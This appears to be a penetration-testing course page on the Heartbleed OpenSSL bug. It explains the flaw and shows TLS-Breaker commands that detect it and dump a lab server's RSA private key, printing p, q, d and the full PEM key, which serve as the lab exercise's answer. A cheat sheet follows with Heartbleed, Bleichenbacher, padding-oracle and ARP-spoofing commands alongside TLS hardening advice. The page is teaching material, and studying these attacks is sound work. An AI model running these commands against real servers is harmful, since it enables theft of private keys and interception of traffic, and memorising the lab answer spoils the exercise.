HTTPs/TLS Attacks

Heartbleed Bug

The Heartbleed Bug is an example of an implementation flaw in a library providing cryptographic algorithms for TLS that results in a high-impact vulnerability in a huge number of TLS servers.

The Heartbleed Bug

The base functionality of TLS can be extended with a multitude of extensions. One such extension is the Heartbeat extension. The heartbeat extension implements a check to see whether the current TLS connection is still alive. More specifically, the client sends a Heartbeat Request message to the server, to which the server responds. If the client receives the expected response, he knows that the server is still there and the connection is still alive.

The Heartbeat Request message consists of an arbitrary payload chosen by the client, as well as the length of the payload. The server then copies the payload into memory and sends the response. So, in normal usage, the client might send ("HackTheBox", 10) to the server, which then replies with "HackTheBox".

However, there was a bug in specific OpenSSL versions that implement the heartbeat extension which did not validate the length sent by the client. That means, a malicious client could send a small payload with a large length field, and the server would read data from its memory far beyond the end of the payload sent in the heartbeat message. For instance, an attacker might send the following heartbeat message: ("HackTheBox", 1024). The server would then respond with 1024 bytes of data, starting at the location where "HackTheBox" was stored in the server's memory. This would then leak the content of the server's memory to the client. As it turns out, this memory might contain the server's private key, leading to a complete compromise.

Since the heartbeat extension was enabled by default in the vulnerable OpenSSL versions, a huge number of servers were affected by this bug, making it very serious at the time.

Tools & Prevention

To exploit the Heartbleed Bug, we can again use the TLS-Breaker tool collection. We can run the Heartbleed detection tool like so:

[!bash!]$ java -jar apps/heartbleed-1.0.0.jar -h

To identify a vulnerable server, we can pass the IP address and port using the -connect flag. A vulnerable server looks like this:

[!bash!]$ java -jar heartbleed-1.0.0.jar -connect 127.0.0.1:443
14:04:52 [main] INFO : ClientTcpTransportHandler - Connection established from ports 50290 -> 443
14:04:52 [main] INFO : WorkflowExecutor - Connecting to 127.0.0.1:443
14:04:52 [main] INFO : ClientTcpTransportHandler - Connection established from ports 50306 -> 443
14:04:52 [main] INFO : SendAction - Sending messages (client): CLIENT_HELLO, 
14:04:52 [main] INFO : ReceiveTillAction - Received Messages (client): SERVER_HELLO, CERTIFICATE, ECDHE_SERVER_KEY_EXCHANGE, SERVER_HELLO_DONE, 
14:04:52 [main] INFO : SendDynamicClientKeyExchangeAction - Sending Dynamic Key Exchange (client): ECDH_CLIENT_KEY_EXCHANGE, 
14:04:52 [main] INFO : SendAction - Sending messages (client): CHANGE_CIPHER_SPEC, FINISHED, 
14:04:52 [main] INFO : ReceiveAction - Received Messages (client): NewSessionTicket, CHANGE_CIPHER_SPEC, FINISHED, 
14:04:52 [main] INFO : SendAction - Sending messages (client): HEARTBEAT, 
14:04:54 [main] WARN : ReceiveMessageHelper - Could not receive more Records after ParserException - Parsing will fail
14:04:54 [main] WARN : ReceiveMessageHelper - Could not parse Message as a CorrectMessage
14:04:54 [main] WARN : ReceiveMessageHelper - Could not parse Message as a CorrectMessage
14:04:54 [main] INFO : ReceiveAction - Received Messages (client): UNKNOWN_MESSAGE, HEARTBEAT, HEARTBEAT, HEARTBEAT, UNKNOWN_MESSAGE, 
14:04:54 [main] INFO : HeartbleedAttacker - Vulnerable. The server responds with a heartbeat message, although the client heartbeat message contains an invalid Length value
14:04:54 [main] INFO : Attacker - Vulnerability status: VULNERABLE

If a server is vulnerable, we can execute the attack to retrieve the server's private key with the -executeAttack flag. It might make sense to increase the number of heartbeat messages sent with the -heartbeats flag. The tool automatically parses the dumped memory to retrieve the private key. Since the attack is not deterministic, it might be necessary to execute the attack multiple times for it to be successful:

[!bash!]$ java -jar heartbleed-1.0.0.jar -connect 127.0.0.1:443 -executeAttack -heartbeats 10

<SNIP>

14:08:06 [main] INFO : HeartbleedAttacker - Prime found!
14:08:06 [main] INFO : HeartbleedAttacker - prime = 138866200437480787133930049744069974606812802444803352675811948587371053684539814119118836631172956605925289638951949511953279399653995160175263273306939560185389009715525288849417218863513613355923931846220909408574261175728746905860940035239178683224848860217455818531522986412928578052409904184896622723843
14:08:06 [main] INFO : HeartbleedAttacker - Calculated values:
14:08:06 [main] INFO : HeartbleedAttacker - p = 138866200437480787133930049744069974606812802444803352675811948587371053684539814119118836631172956605925289638951949511953279399653995160175263273306939560185389009715525288849417218863513613355923931846220909408574261175728746905860940035239178683224848860217455818531522986412928578052409904184896622723843
14:08:06 [main] INFO : HeartbleedAttacker - q = 136690192507231430111637323901426576885920897832706543756714994456952627394763359080038533987434606703453856818247354652300979569056924180599674831142271765923999473224100296160536014207384344623936095054615904056843166655954703022044705375767508334013778530118819683465877541013460546656781639216627269503219
14:08:06 [main] INFO : HeartbleedAttacker - phi = 18981647670547034231720684466754883987173383918913375628854000778181419949416003148871336061999935853734569224941856002549195228999169955980218873514237122232901330355106913794387764659966538735648519040222345160150925008863130063483216154080567177470490396579356519290912902354141136933039264833216145668349545191037200066416105053242918638613319409035015161466775645389858042304432549001661599177251768344892644424435285751066701324945968406135536147739384186086324137050950266639420220546619829499917362097598993992149973145609182607074861589938804570921258237380864172364589630618273058365026729142542341344323556
14:08:06 [main] INFO : HeartbleedAttacker - d = 1961391550192174127854684761415140674140381096157611421923482815353839447906452436397099162486283558928399267456646609537561226342102612904131135258532032161392920169748142579239115953999929815490665897743041662336421626867588031034504780435991896574914337940940268072051851240402273209187816064979168080108383356481131556979566709195737446338547675938555665859789198019136040137412716814002049981359369138526526817557650718010035573378917223039654710964662857747174680807925831296552386187065466612347839787065938131358463435037694502572759856067039756996486881968097596399789446855164947300730289908804137137552209
14:08:06 [main] INFO : HeartbleedAttacker - Encoded private key: 
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAll0Vwr1LOSaW/XoEER3qtS/6Lz/nnvUDcEbCfBOvqtZfVzwV
BtQlWg65SKkIIl3/OJHTWvBQbflmFl0PsLImEZTQ5sQDehfE1tc4ITaBp042z38h
oc0dphhniRPAXKECuel+iv4t1hIFXp8w5p8wTcNHtSehZpma3PE3ZzrwdFW0zPI5
wrYKCiOotDskKqbOGp1vPs14cSPBZAiCg9MDfPxmW1ww+uAj7BomWiI+EjEzieXk
dq2RMmjV0zAuV9Hx4nnBXSfVFPkO9lDstE+rzKoee/Y5y0WSjxJpdToktei/U5lK
KO8O/wOfPeajI+4XwGibISDZFoWxj0UDxQhz2QIDAQABAoIBAA+JhtocnU1Gg4ul
tA3gvYQDdSK0w8ZVIwnTBf20Ow64IBnvh2yxNzrbEqJDdSe39sttph1bf7QddUMS
UrC7d9uRORTfZEyVcC2TB6XG8BbNqjQ+usbxXwLuuqQbemEX8iQr0HukUDAypINm
h7MM9/zRFPPPKIpljO8Prd3o5TfgCsZZzgi+Ffp0pD3hJVjwq+xUEbf5bkaKj9WR
KKcFsWmhQWPh0wSdOxXgCXmrbCPQvY3LaU6X0w2ab2g/HubCrw7GxaR8FJLIc9HX
B/d3Qd6xgCLPq6+06LKNPtbANM99YIjszgiPLCXaeWQPdzONTqSV9STVYYXXVSES
NuShO1ECgYEAxcCFRVOmmXQxj8GXXG1tv1wD0vn7DUYAciIOtBRasiQDDLzulJBl
pc1wrYFLdAQrXFAhU5i333c7uig+OafW5GzV56qbm1FNakziOXqMZrOK6a2J+ZRq
H7NlK22F9YM8EDLIte/BSnc3S0LlSjV1zTOMtiAJft+qaM1BiJ+8gwMCgYEAwqc+
XgivntX1xpgDEoJ6C665IthI4gV0a4d+yb21Y/jasPnKCtvgkkO96PshRJB8CS49
RCCZ2Nc+wvTxYhfNeCjBeMykYR9D9yLl7+sC4RLyMI+GxQA/Yj7MMB5r7BJiSZQj
VKnJCNbIRh/eS1wUG00GeHsF38NMlH/O3GsACPMCgYEAlIqEkQrAvcv13pIAbEEW
iwNHLBbyaYoHk7PZb5NKfT1nvQ29+IJumBi1Zt8UGlV3bKQUJIM2uvkJOFA6TXyx
gmvuUVJqCEUN7adK1voitJJw6g6c8Yh2HtHWUMS4Ny8Y0uISufcaLiFWu4XITfHS
Rw1NyRBPkanYi1iCvWmfZJkCgYEAoMIY2vZXfFl+UtaGawoBG5bgZau0fZ49qPTN
PHYF0ZvbmR+iwlcXYBS8SiblMcgV+EsM5C/8fz49IivDEt1PnzYhms9/zopQylEz
D3LK/PF1va87gYWT02LDpdXqEZyZOeUzTJ+wXTFtU6TMJPbV0DpL5sLLdiLIIzhu
slFYRQsCgYAyXODgQLUM9SGqMpRozAu8G1vfTJupBwSC/oofP8fp7VPCVP7WIQaT
iLQoxXSZoJ+hXF3eBWPDWQ2BVsx57zluBN595MLOWvr5mJWsSlVjA3/wm9TvOkDa
YKxxHU+cgQ6NUBkMqrKlr1yLX4g4niq71Nrev8j+N1yyR0JRJoCGZg==
-----END RSA PRIVATE KEY-----

Prevention

Preventing the heartbleed bug is relatively easy, as it is a bug specific to the OpenSSL library. Therefore, it is only required to make sure that a web server does not run a vulnerable version of OpenSSL. Vulnerable versions are OpenSSL 1.0.1 through 1.0.1f.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

+ 2 Exploit the Heartbleed bug to obtain the server's private key. Submit the first 10 digits of d.

+10 Streak pts

Previous Next

Go to Questions

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

OpenSSL

Command	Description
`openssl genrsa -out key.pem 2048`	Generate 2048 Bit RSA key
`openssl s_client -connect hackthebox.com:443 \| openssl x509 > hackthebox.pem`	Download certificate of web server
`openssl x509 -outform der -in hackthebox.pem -out hackthebox.der`	Convert PEM certificate to DER format
`openssl crl2pkcs7 -nocrl -certfile hackthebox.pem -out hackthebox.p7`	Convert PEM certificate to PKCS#7 format
`openssl req -x509 -newkey rsa:4096 -keyout key.pem -out selfsigned.pem -sha256 -days 365`	Create self-signed certificate
`openssl rsa -in rsa.pem -pubout > rsa_pub.pem`	Extract public key from RSA key-pair
`openssl rsautl -encrypt -inkey rsa_pub.pem -pubin -in msg.txt -out msg.enc`	Encrypt file with RSA public key
`openssl rsautl -decrypt -inkey rsa.pem -in msg.enc > decrypted.txt`	Decrypt file with RSA private key

TLS 1.2 Handshake

Message	Description
ClientHello	Contains ClientRandom, Cipher Suites supported by client
ServerHello	Contains TLS version, Cipher Suite for session, ServerRandom
Certificate	Contains server certificate
ServerKeyExchange	Contains server key share (only for PFS cipher suites)
ServerHelloDone	Tells client that the ServerHello is complete
ClientKeyExchange	Contains client key share
ChangeCipherSpec	Concludes handshake, all subsequent messages are protected

TLS 1.3 Handshake

Message	Description
ClientHello	Contains ClientRandom, Cipher Suites supported by client, client key share
ServerHello	Contains TLS version, Cipher Suite for session, ServerRandom, server key share
Finished	Concludes handshake

Padding Oracles

Command	Description
`padbuster http://127.0.0.1:4000/admin "AAAAAAAAAAAAAAAAAAAAAJQB/nhNEuPuNC8ox7cN1z0=" 16 -encoding 0 -cookies "user=AAAAAAAAAAAAAAAAAAAAAJQB/nhNEuPuNC8ox7cN1z0="`	Run padbuster with an encrypted sample with block size 16

Parameters:

specify block length
specify encoding with -encoding flag
specify location of ciphertext with -cookies or -post flags
specify plaintext to encrypt with -plaintext flag
specify -usebody flag to analyze response content

POODLE

SSL 3.0 padding:

arbitrary padding bytes
last byte is the length of padding excluding the length itself
Example for block size 8: DEADBEEF -> DEADBEEF00000003

Bleichenbacher

Command	Description
`java -jar bleichenbacher-1.0.0.jar -pcap ./bleichenbacher.pcap -executeAttack`	Run Bleichenbacher attack from pcap file
`java -jar bleichenbacher-1.0.0.jar -executeAttack -connect 127.0.0.1:443 -encrypted_premaster_secret <SNIP>`	Run Bleichenbacher attack against server with encrypted premaster secret
`echo -n 214[...]3a8 \| awk -F '0303' '{print "0303"$2}'`	Extract unpadded premaster secret from padded premaster secret
`PMS_CLIENT_RANDOM <client_random> <premaster_secret>`	Wireshark Key file syntax

Heartbleed

Command	Description
`java -jar heartbleed-1.0.0.jar -connect 127.0.0.1:443 -executeAttack -heartbeats 10`	Run Heartbleed attack

SSL Stripping

Command	Description
`sudo arpspoof -i docker0 172.17.0.5`	Run ARP spoofing attack on interface `docker0` targeting `172.17.0.5`
`Strict-Transport-Security: max-age=31536000`	HSTS header syntax

Testing TLS Configuration

Command	Description
`bash testssl.sh https://hackthebox.com`	Test TLS configuration of a website

TLS Best Practices:

do not offer SSL 2.0 or SSL 3.0
do not offer TLS 1.0 or TLS 1.1
no NULL cipher suites
no EXPORT cipher suites
prefer PFS cipher suites
prefer GCM mode over CBC mode

HTTPs/TLS Attacks

Heartbleed Bug

The Heartbleed Bug

Tools & Prevention

Prevention

Questions

Table of Contents

Introduction to HTTPs/TLS

Padding Oracle Attacks

TLS Compression

Heartbleed

Further Attacks

TLS Best Practices

Skills Assessment

My Workstation